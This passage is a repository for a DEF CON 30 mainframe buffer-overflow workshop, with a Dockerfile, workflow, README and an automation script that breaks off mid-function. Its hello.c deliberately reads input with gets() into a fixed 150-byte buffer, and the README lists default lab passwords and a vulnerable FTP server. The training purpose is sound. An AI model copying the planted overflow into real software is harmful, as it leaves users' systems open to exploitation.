├── .github ├── buildkitd.toml └── workflows │ └── sysgen.yml ├── .gitignore ├── Dockerfile ├── GETSPLOIT ├── README.md └── hello.c ├── README.md ├── automation.py ├── extra ├── FTPD.MVP ├── Wallpapers │ ├── title.jpg │ ├── wallpaper.1.png │ ├── wallpaper.2.png │ ├── wallpaper.3.png │ ├── youdidit.jpg │ └── youdidit2.jpg ├── a2etable.py ├── e2alookup.py └── findbytes.py ├── jcl ├── MACLFTPD.jcl ├── logon_screen.jcl └── terminals.jcl ├── matrix.txt ├── motd.txt ├── mvs.sh ├── overflows ├── LGBT400 ├── LOC400 └── WTO400 ├── rexx ├── DEBRUIJN.rex └── decodei.rex ├── screenshot.png ├── upload.py ├── usersjcl.py ├── vtam_screen.ans ├── web3270.ini └── wiki ├── start_tiddlywiki.sh ├── tiddlywiki └── mywiki │ ├── tiddlers │ ├── $__DefaultTiddlers.tid │ ├── $__Import.tid │ ├── $__SiteSubtitle.tid │ ├── $__SiteTitle.tid │ ├── $__StoryList.tid │ ├── $__config_PageControlButtons_Visibility_$__core_ui_Buttons_control-panel.tid │ ├── $__config_PageControlButtons_Visibility_$__core_ui_Buttons_export-page.tid │ ├── $__config_PageControlButtons_Visibility_$__core_ui_Buttons_home.tid │ ├── $__config_PageControlButtons_Visibility_$__core_ui_Buttons_import.tid │ ├── $__config_PageControlButtons_Visibility_$__core_ui_Buttons_new-image.tid │ ├── $__config_PageControlButtons_Visibility_$__core_ui_Buttons_new-tiddler.tid │ ├── $__config_PageControlButtons_Visibility_$__core_ui_Buttons_theme.tid │ ├── $__themes_tiddlywiki_vanilla_metrics_storyright.tid │ ├── $__themes_tiddlywiki_vanilla_metrics_storywidth.tid │ ├── $__themes_tiddlywiki_vanilla_metrics_tiddlerwidth.tid │ ├── ASCII_EBCDIC Table.tid │ ├── Getting Started.tid │ ├── Joblogheader.png │ ├── Joblogheader.png.meta │ ├── LAB6.png │ ├── LAB6.png.meta │ ├── Lab 1 - Run HELLO.tid │ ├── Lab 10 - FTP Buffer Overflow.tid │ ├── Lab 11 - 2 Crash 2 Furious.tid │ ├── Lab 12 - Hackers Returns.tid │ ├── Lab 13 - Not So Fast There.tid │ ├── Lab 14 - Sockets and EBCDIC.tid │ ├── Lab 15 - RCE.tid │ ├── Lab 2 - First Overflow.tid │ ├── Lab 3 - Find our return address.tid │ ├── Lab 4 - Exploit!.tid │ ├── Lab 5 - OPENTST.tid │ ├── Lab 6 - De Brujin.tid │ ├── Lab 7 - De Brujin Overflow.tid │ ├── Lab 8 - Add our own Shell Code.tid │ ├── Lab 9 - Privesc with ARBAUTH.tid │ ├── Screenshot_2022-07-24_12-32-18.png │ ├── Screenshot_2022-07-24_12-32-18.png.meta │ ├── Screenshot_2022-07-24_12-32-44.png │ ├── Screenshot_2022-07-24_12-32-44.png.meta │ ├── Screenshot_2022-07-24_12-41-23.png │ ├── Screenshot_2022-07-24_12-41-23.png.meta │ ├── Screenshot_2022-07-31_11-06-42.png │ ├── Screenshot_2022-07-31_11-06-42.png.meta │ ├── Screenshot_2022-07-31_11-32-55.png │ ├── Screenshot_2022-07-31_11-32-55.png.meta │ ├── Screenshot_2022-07-31_11-40-25.png │ ├── Screenshot_2022-07-31_11-40-25.png.meta │ ├── Screenshot_2022-07-31_11-50-09.png │ ├── Screenshot_2022-07-31_11-50-09.png.meta │ ├── Screenshot_2022-07-31_12-00-00.png │ ├── Screenshot_2022-07-31_12-00-00.png.meta │ ├── Screenshot_2022-07-31_12-05-20.png │ ├── Screenshot_2022-07-31_12-05-20.png.meta │ ├── Screenshot_2022-07-31_14-59-18.png │ ├── Screenshot_2022-07-31_14-59-18.png.meta │ ├── Screenshot_2022-07-31_15-01-47.png │ ├── Screenshot_2022-07-31_15-01-47.png.meta │ ├── Screenshot_2022-07-31_15-25-34.png │ ├── Screenshot_2022-07-31_15-25-34.png.meta │ ├── Screenshot_2022-07-31_17-01-06.png │ ├── Screenshot_2022-07-31_17-01-06.png.meta │ ├── Screenshot_2022-07-31_17-14-33.png │ ├── Screenshot_2022-07-31_17-14-33.png.meta │ ├── Screenshot_2022-07-31_17-36-55.png │ ├── Screenshot_2022-07-31_17-36-55.png.meta │ ├── Screenshot_2022-07-31_23-23-29.png │ ├── Screenshot_2022-07-31_23-23-29.png.meta │ ├── Screenshot_2022-07-31_23-34-15.png │ ├── Screenshot_2022-07-31_23-34-15.png.meta │ ├── Screenshot_2022-08-01_00-06-05.png │ ├── Screenshot_2022-08-01_00-06-05.png.meta │ ├── Screenshot_2022-08-01_09-21-12.png │ ├── Screenshot_2022-08-01_09-21-12.png.meta │ ├── Screenshot_2022-08-01_09-28-19.png │ ├── Screenshot_2022-08-01_09-28-19.png.meta │ ├── Screenshot_2022-08-01_16-56-25.png │ ├── Screenshot_2022-08-01_16-56-25.png.meta │ ├── Screenshot_2022-08-01_16-58-16.png │ ├── Screenshot_2022-08-01_16-58-16.png.meta │ ├── Screenshot_2022-08-01_17-13-16.png │ ├── Screenshot_2022-08-01_17-13-16.png.meta │ ├── Screenshot_2022-08-01_17-48-30.png │ ├── Screenshot_2022-08-01_17-48-30.png.meta │ ├── Screenshot_2022-08-01_17-55-01.png │ ├── Screenshot_2022-08-01_17-55-01.png.meta │ ├── Screenshot_2022-08-01_17-56-51.png │ ├── Screenshot_2022-08-01_17-56-51.png.meta │ ├── Screenshot_2022-08-03_16-17-06.png │ ├── Screenshot_2022-08-03_16-17-06.png.meta │ ├── Screenshot_2022-08-04_15-46-24.png │ ├── Screenshot_2022-08-04_15-46-24.png.meta │ ├── Welcome DEF CON 30!.tid │ ├── arbauthwto.png │ ├── arbauthwto.png.meta │ ├── arbpoc.png │ ├── arbpoc.png.meta │ ├── clistaddress.png │ ├── clistaddress.png.meta │ ├── dataset user.png │ ├── dataset user.png.meta │ ├── debruijnrexx.png │ ├── debruijnrexx.png.meta │ ├── denied.png │ ├── denied.png.meta │ ├── editor.png │ ├── editor.png.meta │ ├── emem.png │ ├── emem.png.meta │ ├── exploitshell.png │ ├── exploitshell.png.meta │ ├── exploitxor.png │ ├── exploitxor.png.meta │ ├── hexhiighlight.png │ ├── hexhiighlight.png.meta │ ├── image.png │ ├── image.png.meta │ ├── image_edit.png │ ├── image_edit.png.meta │ ├── joblog.png │ ├── joblog.png.meta │ ├── lgtbmemory.png │ ├── lgtbmemory.png.meta │ ├── linewtosml.png │ ├── linewtosml.png.meta │ ├── neowhiterabbit.png │ ├── neowhiterabbit.png.meta │ ├── newwtosml.png │ ├── newwtosml.png.meta │ ├── opentstac0.png │ ├── opentstac0.png.meta │ ├── privesc.png │ ├── privesc.png.meta │ ├── putv.png │ ├── putv.png.meta │ ├── rceoverflow.png │ ├── rceoverflow.png.meta │ ├── shellcodejcl.png │ ├── shellcodejcl.png.meta │ ├── thebytes.png │ ├── thebytes.png.meta │ ├── title.jpg │ ├── title.jpg.meta │ ├── wallpaper.3.png │ ├── wallpaper.3.png.meta │ ├── whiterabbit.png │ ├── whiterabbit.png.meta │ ├── youdidit.jpg │ └── youdidit.jpg.meta │ └── tiddlywiki.info └── users.txt /.github/buildkitd.toml: -------------------------------------------------------------------------------- 1 | # .github/buildkitd.toml 2 | [worker.oci] 3 | max-parallelism = 1 4 | -------------------------------------------------------------------------------- /.github/workflows/sysgen.yml: -------------------------------------------------------------------------------- 1 | 2 | name: Mainframe Overflow Container 3 | 4 | on: 5 | push: 6 | branches: 7 | - main 8 | pull_request: 9 | branches: 10 | - main 11 | workflow_dispatch: 12 | jobs: 13 | # Sysgen 14 | mvsce-kicks: 15 | name: MVS/CE Overflow Class Cross Platform Docker 16 | runs-on: [ubuntu-latest] 17 | steps: 18 | - name: Checkout 19 | uses: actions/checkout@v4 20 | - name: Set up QEMU 21 | uses: docker/setup-qemu-action@v3 22 | - name: Set up Docker Buildx 23 | uses: docker/setup-buildx-action@v3 24 | with: 25 | config: .github/buildkitd.toml 26 | - name: Login to Docker Hub 27 | uses: docker/login-action@v3 28 | with: 29 | username: ${{ secrets.DOCKERHUB_USERNAME }} 30 | password: ${{ secrets.DOCKERHUB_TOKEN }} 31 | - name: Build and push 32 | uses: docker/build-push-action@v5 33 | with: 34 | platforms: linux/amd64,linux/arm64 35 | push: true 36 | tags: mainframed767/defcon30:latest -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | wiki/*.png 2 | jcl/upload.jcl 3 | ARBAUTH/ 4 | users/* 5 | reader.jcl 6 | GETSPLOIT/hello.obj 7 | GETSPLOIT/hello.load 8 | web3270/ 9 | a.out 10 | docker/ 11 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | 2 | 3 | FROM mainframed767/jcc:wine as getsploit_builder 4 | # First compile and link hello.c to hello.load 5 | WORKDIR / 6 | COPY GETSPLOIT/hello.c hello.c 7 | RUN wine /jcc/jcc.exe -I/jcc/include/ -o hello.c 8 | RUN /jcc/prelink -s /jcc/objs /hello.load /hello.obj 9 | 10 | FROM mainframed767/mvsce:2.0.3 as MVSCE_builder 11 | # Install rdrprep 12 | RUN unset LD_LIBRARY_PATH && apt-get update && apt-get install -yq git build-essential python3-pip lftp 13 | RUN pip3 install ebcdic 14 | WORKDIR / 15 | RUN git clone --depth 1 https://github.com/mvslovers/rdrprep.git 16 | WORKDIR /rdrprep 17 | ENV HOST_ARCH=NOT_PENTIUM 18 | RUN make && make install 19 | # Copy compiled hello.load 20 | WORKDIR /builder 21 | ADD ./ /builder/ 22 | COPY --from=getsploit_builder /hello.load /builder/GETSPLOIT/hello.load 23 | RUN git clone --depth 1 https://github.com/jake-mainframe/ARBAUTH 24 | # Build the JCL 25 | RUN ./upload.py motd.txt 26 | RUN mkdir ./users && ./usersjcl.py 27 | RUN for i in users/*.jcl; do rdrprep $i; mv reader.jcl $i.ebcdic; ls $i.ebcdic; done 28 | COPY extra/FTPD.MVP /MVSCE/MVP/packages/FTPD 29 | # Submit the JCL to MVS/CE 30 | # until ./sysgen.py --timeout 3600 --version ${RELEASE_VERSION} --CONTINUE; do echo "Failed, rerunning"; done 31 | RUN until python3 -u automation.py --mvsce /MVSCE --initial; do echo "Failed, trying again"; done 32 | RUN until python3 -u automation.py --mvsce /MVSCE --ftp; do echo "Failed, trying again"; done 33 | RUN until python3 -u automation.py --mvsce /MVSCE --users; do echo "Failed, trying again"; done 34 | # Install web3270 and its requirements 35 | WORKDIR / 36 | RUN git clone --depth 1 https://github.com/MVS-sysgen/web3270.git 37 | WORKDIR /web3270 38 | RUN pip install --no-cache-dir --upgrade pip && \ 39 | pip install --no-cache-dir --user -r requirements.txt 40 | 41 | 42 | # Final Build 43 | FROM mainframed767/mvsce:2.0.3 44 | COPY --from=MVSCE_builder /MVSCE /MVSCE 45 | COPY --from=MVSCE_builder /root/.local /root/.local 46 | COPY --from=MVSCE_builder /web3270 /web3270 47 | ADD web3270.ini /web3270/ 48 | ADD mvs.sh / 49 | RUN unset LD_LIBRARY_PATH && apt-get update && apt-get install --no-install-recommends -yq c3270 nodejs npm &&\ 50 | sed -i "s/0400.8/0400.32/g" /MVSCE/conf/local.cnf &&\ 51 | npm install -g tiddlywiki@5.2.0 52 | COPY wiki/users.txt /auth/users.txt 53 | WORKDIR /var/lib/tiddlywiki 54 | COPY wiki/tiddlywiki/ /var/lib/tiddlywiki/ 55 | # Add init-and-run script 56 | ADD wiki/start_tiddlywiki.sh /usr/local/bin/start_tiddlywiki 57 | WORKDIR / 58 | VOLUME ["/config","/dasd","/printers","/punchcards","/logs", "/certs"] 59 | EXPOSE 3221 3223 3270 3505 3506 8888 8443 2121 2323 60 | ENTRYPOINT ["./mvs.sh"] 61 | 62 | 63 | -------------------------------------------------------------------------------- /GETSPLOIT/README.md: -------------------------------------------------------------------------------- 1 | This is the vulnerable C program used in the class. Original author Jake Labelle. 2 | 3 | To compile it: 4 | 5 | ``` 6 | docker run -it --entrypoint /bin/bash -v $(pwd):/project mainframed767/jcc:wine 7 | cd project/ 8 | wine /jcc/jcc.exe -I/jcc/include/ -o hello.c 9 | /jcc/prelink -s /jcc/objs /project/hello.load /project/hello.obj 10 | ``` -------------------------------------------------------------------------------- /GETSPLOIT/hello.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int main (int argc, char ** argv) { 6 | char buff[150]; 7 | printf("Hi, D3FC0N attendee what is your handle?\n"); 8 | gets(buff); 9 | printf("Wake up, %s\n\nThe Matrix has you...\n\n", buff); 10 | printf("Follow the white rabbit.\n\n", buff); 11 | printf(" _________________\n" 12 | " / __ \\ \n" 13 | " | (__) | \n" 14 | " | | \n" 15 | " | .-----. .--. | \n" 16 | " | | | / \\ | \n" 17 | " | '-----' \\ / | \n" 18 | " | | | | \n" 19 | " | LI DC LI | | | \n" 20 | " | LI 30 LI | | |Oo \n" 21 | " | LI LI LI | | |`Oo \n" 22 | " | LI LI LI | | | Oo \n" 23 | " | | | | Oo \n" 24 | " | .------. / \\ | oO \n" 25 | " | | | \\ / | Oo \n" 26 | " | '------' '-oO | oO \n" 27 | " | .---Oo | Oo \n" 28 | " | || ||`Oo oO \n" 29 | " | |'--'| | OoO \n" 30 | " | '----' | \n" 31 | " \\_________________/ \n\n" 32 | " Ring Ring %s\n\n", buff); 33 | return 0; 34 | }; 35 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # DEF CON 30 Workshop Mainframe Container 2 | 3 | ![DEFCON MAINFRAME](/screenshot.png?raw=true "DEF CON 30") 4 | 5 | The scripts here are used to build the MVS 3.8j virtual mainframe for the DEFCON 30 workshop. 6 | 7 | Thank you for taking a look at the DEFCON 30 Mainframe Buffer Overflow workshop. 8 | 9 | ## Use docker 10 | 11 | This docker container has everything you need to learn how to do MVS buffer overflows! 12 | 13 | To start the class run the container and go to http://localhost:8080 14 | 15 | To run the container use the below commands, make sure to change `$(pwd)/docker` to a folder for your system. 16 | The `$(pwd)` puts the docker volumes in your current working folder. 17 | 18 | ### Minimal Container 19 | Use this command if you just want to run it self contained. :warning: If you remove and relaunch the container 20 | you will lose any and all changes you made to the mainframe environment. 21 | 22 | ```bash 23 | docker run -d \ 24 | --name=defcon30 \ 25 | -e HUSER=defcon \ 26 | -e HPASS=defcon \ 27 | -p 2323:3223 \ 28 | -p 8888:8888 \ 29 | -p 2121-2141:2121-2141 \ 30 | -p 8443:8443 \ 31 | -p 8080:8080 \ 32 | -p 31337-31347:31337-31347 \ 33 | -v ~/dumps:/printers \ 34 | --restart unless-stopped \ 35 | mainframed767/defcon30:latest 36 | ``` 37 | 38 | Ports explained: 39 | 40 | - 2323: 3270 server port 41 | - 8443: Web based tn3270 client, the secret is D3FC0N 42 | - 8888: Hercules console web server. Username/password: defcon 43 | - 8080: The workshop instructions 44 | - 2121-2141 & 31337-31347: Range of web ports for FTP server 45 | 46 | Python scripts mentioned can be found here: https://github.com/mainframed/DC30_Workshop/tree/main/extra 47 | 48 | ### Expert Container 49 | 50 | This exposes more ports and allows you to have volumes with permanence. Gives access to the 51 | hercules and MVS consoles, the card readers/writers, etc. 52 | 53 | ```bash 54 | docker run -d \ 55 | --name=defcon30 \ 56 | -e HUSER=docker \ 57 | -e HPASS=docker \ 58 | -p 3221:3221 \ 59 | -p 2323:3223 \ 60 | -p 3270:3270 \ 61 | -p 3505:3505 \ 62 | -p 3506:3506 \ 63 | -p 8888:8888 \ 64 | -p 2121:2121 \ 65 | -p 8443:8443 \ 66 | -p 8080:8080 \ 67 | -p 31337-31347:31337-31347 \ 68 | -v $(pwd)/docker/config:/config \ 69 | -v $(pwd)/docker/printers:/printers \ 70 | -v $(pwd)/docker/punchcards:/punchcards \ 71 | -v $(pwd)/docker/logs:/logs \ 72 | -v $(pwd)/docker/dasd:/dasd \ 73 | -v $(pwd)/docker/certs:/certs \ 74 | --restart unless-stopped \ 75 | mainframed767/defcon30:latest 76 | ``` 77 | 78 | **Ports** 79 | 80 | | Port | Description | 81 | |--------------|-------------------------------------------------------------------------------------| 82 | | 2323 | TLS Encrypted TN3270 Server Port | 83 | | 3270 | Unencrypted TN3270 Server Port | 84 | | 3221 | Encrypted FTPD server | 85 | | 2121 | Unencrypted FTP Server Port | 86 | | 8443 | Web based 3270 client which auto connects to lab mainframe https://localhost:8443 | 87 | | 8080 | The class Wiki https://localhost:8080 | 88 | | 8888 | Hercules Web Server/MVS Console. User/pass = docker | 89 | | 3505 | Punch card reader. Converts ASCII to EBCDIC. | 90 | | 3506 | Punch card reader. Only accepts EBCDIC files. | 91 | | 31337-32337 | FTP Server passive port range | 92 | 93 | **Volumes** 94 | 95 | | Folder | Description | 96 | |-------------|--------------------------------------------------------| 97 | | /config | Contains the Hercules and web3270 config files | 98 | | /printers | Contains the output of the printers on `CLASS=A` | 99 | | /punchcards | Contains the output of the puncard writer on `CLASS=B` | 100 | | /logs | Contains Hercules logs | 101 | | /dasd | Contains the MVS/CE disk images | 102 | | /certs | Contains the certificates used for TLS encryption | 103 | 104 | ### Users 105 | 106 | | Username | Password | Description | 107 | |----------|----------|----------------------------------------------| 108 | | IBMUSER | SYS1 | Adminstrative User with access to everything | 109 | | MVSCE01 | CUL8TR | Adminstrative User with access to everything | 110 | | MVSCE02 | PASS4U | Generic User | 111 | | DC0 | DC0 | DEFCON Workshop User | 112 | | DC1 | DC1 | DEFCON Workshop User | 113 | | DC2 | DC2 | DEFCON Workshop User | 114 | | DC3 | DC3 | DEFCON Workshop User | 115 | | DC4 | DC4 | DEFCON Workshop User | 116 | | DC5 | DC5 | DEFCON Workshop User | 117 | | DC6 | DC6 | DEFCON Workshop User | 118 | | DC7 | DC7 | DEFCON Workshop User | 119 | | DC8 | DC8 | DEFCON Workshop User | 120 | | DC9 | DC9 | DEFCON Workshop User | 121 | | DC10 | DC10 | DEFCON Workshop User | 122 | | DC11 | DC11 | DEFCON Workshop User | 123 | | DC12 | DC12 | DEFCON Workshop User | 124 | | DC13 | DC13 | DEFCON Workshop User | 125 | | DC14 | DC14 | DEFCON Workshop User | 126 | | DC15 | DC15 | DEFCON Workshop User | 127 | | DC16 | DC16 | DEFCON Workshop User | 128 | | DC17 | DC17 | DEFCON Workshop User | 129 | | DC18 | DC18 | DEFCON Workshop User | 130 | | DC19 | DC19 | DEFCON Workshop User | 131 | | DC20 | DC20 | DEFCON Workshop User | 132 | | DC21 | DC21 | DEFCON Workshop User | 133 | | DC22 | DC22 | DEFCON Workshop User | 134 | | DC23 | DC23 | DEFCON Workshop User | 135 | 136 | :warning: With the current setup the maximum number of concurrent users is 24. If a 25th user logs on you get 137 | the following error message `IKT00203I ADDRESS SPACE CREATION FAILED`. 138 | 139 | ## Building from scratch 140 | 141 | - Download the most recent version of MVSCE from https://github.com/MVS-sysgen/sysgen/releases 142 | - Copy the vulnerable FTPD server to MVP: `cp extra/FTPD.MVP MVSCE/MVP/packages` 143 | - Launch MVSCE 144 | - Submit the job `MACLFTPF.jcl`: `cat jcl/MACLFTPF.jcl|ncat --send-only -w1 127.0.0.1 3505` 145 | - Submit the job `logon_screen.jcl`: `cat jcl/logon_screen.jcl|ncat --send-only -w1 127.0.0.1 3505` 146 | - Submit the job `terminal.jcl`: `cat terminal.jcl|ncat --send-only -w1 127.0.0.1 3505` 147 | - Clone the ARBAUTH repo: `git clone https://github.com/jake-mainframe/ARBAUTH` 148 | - Run the python script `upload.py`: `./upload.py motd.txt` 149 | - Submit the job `upload.jcl`: `cat upload.jcl|ncat --send-only -w1 127.0.0.1 3505` 150 | - Install `https://github.com/mvslovers/rdrprep` on your Linux box 151 | - Clone `https://github.com/mvslovers/jcc` to this folder 152 | - Install wine and wine 32: `sudo apt install wine wine32` 153 | - Compile `GETSPLOIT/hello.c`: 154 | - `wine ./jcc/jcc.exe -I./jcc/include -o ./GETSPLOIT/hello.c` 155 | - `./jcc/prelink -s ./jcc/objs hello.load hello.obj` 156 | - Copy `hello.load` to `./GETSPLOIT`: `cp hello.load GETSPLOIT` 157 | - Run usersjcl.py: `./usersjcl.py` 158 | - Convert each job in the users folder with `rdrprep` and submit them one by one: 159 | - `for i in *.jcl; do echo $i;rdrprep $i;cat reader.jcl|ncat --send-only -w1 172.17.0.3 3506; read; done` 160 | - You can check the output of MVSCE `printers/prt00e.txt` to see each job completed 161 | - Shutdown MVS/CE 162 | - Re-IPL MVS/CE and enjoy your lab environment 163 | - Then download web3270 from https://github.com/MVS-sysgen/web3270 164 | - Follow the instructions on how to prepare for web3270 165 | - Edit `web3270.ini` as appropriate 166 | - Launch web3270 with `python3 -u ./server.py --config /path/to/config --certs /path/to/certs` 167 | 168 | ## Files 169 | 170 | - `GETSPLOIT/hello.c` vulnerable C program from https://github.com/jake-mainframe/GETSPLOIT 171 | - `ARBAUTH` from https://github.com/jake-mainframe/ARBAUTH 172 | - EBCDIC files `overflows/LGBT400`, `overflows/LOC400`, `overflows/WTO400` 173 | - `Dockerfile` used to build docker image 174 | - `MACLFTPD.jcl`: JCL file to install MACLIBS and FTPD server using MVP 175 | - `logon_screen.ans`/`jcl/logon_screen.jcl`: ANSI/JCL to replace the NETSOL logon screen 176 | - `upload.py` generates JCL used to provision datasets, copy files and get the system ready 177 | - `jcl/terminals.jcl` adds 32 new terminal interfaces and updates VTAM config 178 | - `usersjcl.py` creates `DC00.jcl` through `DC23.jcl` in the `./users` folder 179 | - `automation.py` a MVS automation python script used to deploy to docker 180 | - `matrix.txt` Follow the white rabbit 181 | - `rexx/DEBRUIJN.rex`: REXX script to generate de Bruijn pattern 182 | - `rexx/decodei.rex`: decodes MVS hex instructions to human readeable 183 | - `motd.txt` the CLIST run at logon to TSO 184 | - `mvs.sh` the container run script to launch web3270, hercules 185 | 186 | 187 | -------------------------------------------------------------------------------- /automation.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # This script is used to build the DEFCON 30 class LPAR 4 | # run ./upload.py motd.txt && ./usersjcl.py before running this script 5 | # MVS/CE is required to use this script 6 | # Author: Soldier of FORTRAN 7 | # License: GPLv3 8 | 9 | import os, sys, time, math, ebcdic 10 | from telnetlib import theNULL 11 | import subprocess 12 | import threading 13 | import queue 14 | import socket 15 | from pathlib import Path 16 | import argparse 17 | from datetime import datetime 18 | 19 | #TIMEOUT = 1800 #default timeout in second 20 | TIMEOUT = 60 #default timeout in second 21 | 22 | my_parser = argparse.ArgumentParser() 23 | # my_parser.add_argument('--xmi-files','-x', required=True, help="xmi file(s) to be included", nargs="+") 24 | # my_parser.add_argument('--task-files', '-t', required=True, help="JCL file(s) to be included", nargs="+") 25 | my_parser.add_argument('--mvsce', '-m', default="MVSCE", help="MVSCE Folder location") 26 | my_parser.add_argument("--initial",'-i', help="Initial upload", default=False, action="store_true") 27 | my_parser.add_argument('--ftp', '-f', default=False, action="store_true") 28 | my_parser.add_argument('--users', '-u', default=False, action="store_true") 29 | args = my_parser.parse_args() 30 | 31 | cwd = os.getcwd() 32 | 33 | print("[AUTOMATION] Current working directory {}".format(cwd)) 34 | 35 | if not Path("jcl/upload.jcl").is_file(): 36 | print("[ERROR] You must run ./upload.py motd.txt first") 37 | sys.exit() 38 | 39 | error_check = [ 40 | 'open error', 41 | 'Creating crash dump', 42 | 'DISASTROUS ERROR', 43 | 'HHC01023W Waiting for port 3270 to become free for console connections', 44 | 'disabled wait state 00020000 80000005' 45 | ] 46 | 47 | quit_herc_event = threading.Event() 48 | kill_hercules = threading.Event() 49 | reset_herc_event = threading.Event() 50 | STDERR_to_logs = threading.Event() 51 | running_folder = os.getcwd() 52 | 53 | class herc_automation: 54 | 55 | def __init__(self, 56 | config="conf/local.cnf", 57 | rc="conf/mvsce.rc" 58 | ): 59 | 60 | self.config = config 61 | self.rc = rc 62 | self.hercproc = False 63 | self.stderr_q = queue.Queue() 64 | self.stdout_q = queue.Queue() 65 | 66 | def kill(self): 67 | self.hercproc.kill() 68 | 69 | def start_threads(self): 70 | # start a pair of threads to read output from hercules 71 | self.stdout_thread = threading.Thread(target=self.queue_stdout, args=(self.hercproc.stdout,self.stdout_q)) 72 | self.stderr_thread = threading.Thread(target=self.queue_stderr, args=(self.hercproc.stderr,self.stderr_q)) 73 | self.check_hercules_thread = threading.Thread(target=self.check_hercules, args=[self.hercproc]) 74 | # self.queue_printer_thread = threading.Thread(target=self.queue_printer, args=('prt00e.txt',printer_q)) 75 | self.stdout_thread.daemon = True 76 | self.stderr_thread.daemon = True 77 | # self.queue_printer_thread.daemon = True 78 | self.check_hercules_thread.daemon = True 79 | self.stdout_thread.start() 80 | self.stderr_thread.start() 81 | self.check_hercules_thread.start() 82 | # self.queue_printer_thread.start() 83 | 84 | def queue_stdout(self, pipe, q): 85 | ''' queue the stdout in a non blocking way''' 86 | global reply_num 87 | while True: 88 | 89 | l = pipe.readline() 90 | if len(l.strip()) > 0: 91 | if len(l.strip()) > 3 and l[0:2] == '/*' and l[2:4].isnumeric(): 92 | reply_num = l[2:4] 93 | print("[AUTOMATION] Reply number set to {}".format(reply_num)) 94 | if "HHC90020W" not in l and "HHC00007I" not in l and "HHC00107I" not in l and "HHC00100I" not in l: 95 | # ignore these messages, they're just noise 96 | # HHC90020W 'hthread_setschedparam()' failed at loc=timer.c:193: rc=22: Invalid argument 97 | # HHC00007I Previous message from function 'hthread_set_thread_prio' at hthreads.c(1170) 98 | print("[HERCLOG] {}".format(l.strip())) 99 | q.put(l) 100 | for errors in error_check: 101 | if errors in l: 102 | print("Quiting! Irrecoverable Hercules error: {}".format(l.strip())) 103 | kill_hercules.set() 104 | if reset_herc_event.is_set(): 105 | break 106 | 107 | def queue_stderr(self, pipe, q): 108 | ''' queue the stderr in a non blocking way''' 109 | while True: 110 | l = pipe.readline() 111 | if len(l.strip()) > 0: 112 | if STDERR_to_logs.is_set(): 113 | print("[DIAG] {}".format(l.strip())) 114 | if 'MIPS' in l: 115 | print("[DIAG] {}".format(l.strip())) 116 | q.put(l) 117 | 118 | for errors in error_check: 119 | if errors in l: 120 | print("Quiting! Irrecoverable Hercules error: {}".format(l.strip())) 121 | kill_hercules.set() 122 | if reset_herc_event.is_set(): 123 | break 124 | 125 | def check_hercules(self, hercproc): 126 | ''' check to make sure hercules is still running ''' 127 | while hercproc.poll() is None: 128 | if quit_herc_event.is_set() or reset_herc_event.is_set(): 129 | print("[AUTOMATION] Quit Event enabled exiting hercproc monitoring") 130 | return 131 | if kill_hercules.is_set(): 132 | hercproc.kill() 133 | break 134 | continue 135 | 136 | print("[ERROR] - Hercules Exited Unexpectedly") 137 | os._exit(1) 138 | 139 | def check_maxcc(self, jobname, steps_cc={}, printer_file='printers/prt00e.txt'): 140 | '''Checks job and steps results, raises error 141 | If the step is in steps_cc, check the step vs the cc in the dictionary 142 | otherwise checks if step is zero 143 | ''' 144 | print("[AUTOMATION] Checking {} job results".format(jobname)) 145 | 146 | found_job = False 147 | failed_step = False 148 | 149 | logmsg = '[MAXCC] Jobname: {:<8} Procname: {:<8} Stepname: {:<8} Exit Code: {:<8}' 150 | 151 | with open(printer_file, 'r', errors='ignore') as f: 152 | for line in f.readlines(): 153 | if 'IEF142I' in line and jobname in line: 154 | 155 | found_job = True 156 | 157 | x = line.strip().split() 158 | y = x.index('IEF142I') 159 | j = x[y:] 160 | 161 | log = logmsg.format(j[1],'',j[2],j[10]) 162 | maxcc=j[10] 163 | stepname = j[2] 164 | 165 | if j[3] != "-": 166 | log = logmsg.format(j[1],j[2],j[3],j[11]) 167 | stepname = j[3] 168 | maxcc=j[11] 169 | 170 | print(log) 171 | 172 | if stepname in steps_cc: 173 | expected_cc = steps_cc[stepname] 174 | else: 175 | expected_cc = '0000' 176 | 177 | if maxcc != expected_cc: 178 | error = "Step {} Condition Code does not match expected condition code: {} vs {} review prt00e.txt for errors".format(stepname,j[-1],expected_cc) 179 | print(error) 180 | failed_step = True 181 | 182 | if not found_job: 183 | raise ValueError("Job {} not found in printer output {}".format(jobname, printer_file)) 184 | if failed_step: 185 | raise ValueError(error) 186 | 187 | 188 | def reset_hercules(self,clpa=False): 189 | print('[AUTOMATION] Restarting hercules') 190 | self.quit_hercules(msg=False) 191 | 192 | # drain STDERR and STDOUT 193 | while True: 194 | try: 195 | line = self.stdout_q.get(False).strip() 196 | except queue.Empty: 197 | break 198 | 199 | while True: 200 | try: 201 | line = self.stderr_q.get(False).strip() 202 | except queue.Empty: 203 | break 204 | 205 | reset_herc_event.set() 206 | 207 | try: 208 | self.hercmd = subprocess.check_output(["which", "hercules"]).strip() 209 | except: 210 | raise Exception('hercules not found') 211 | 212 | print("[AUTOMATION] Launching hercules") 213 | 214 | h = [ "hercules", '--externalgui', '-f',self.config ] 215 | 216 | if not clpa: 217 | h.append("-r") 218 | h.append(self.rc) 219 | 220 | print("[AUTOMATION] Launching hercules with: {}".format(h)) 221 | 222 | self.hercproc = subprocess.Popen(h, 223 | stdin=subprocess.PIPE, 224 | stdout=subprocess.PIPE, 225 | stderr=subprocess.PIPE, 226 | universal_newlines=True) 227 | reset_herc_event.clear() 228 | quit_herc_event.clear() 229 | self.start_threads() 230 | 231 | self.rc = self.hercproc.poll() 232 | if self.rc is not None: 233 | raise("[AUTOMATION] Unable to start hercules") 234 | print("[AUTOMATION] Hercules launched") 235 | #self.write_logs() 236 | print("[AUTOMATION] Hercules Re-initialization Complete") 237 | 238 | 239 | def quit_hercules(self, msg=True): 240 | if msg: 241 | print("[AUTOMATION] Shutting down hercules") 242 | if not self.hercproc or self.hercproc.poll() is not None: 243 | print("[AUTOMATION] Hercules already shutdown") 244 | return 245 | quit_herc_event.set() 246 | self.send_herc('quit') 247 | self.wait_for_string('Hercules shutdown complete', stderr=True) 248 | if msg: 249 | print('[AUTOMATION] Hercules has exited') 250 | 251 | def wait_for_string(self, string_to_waitfor, stderr=False, timeout=False): 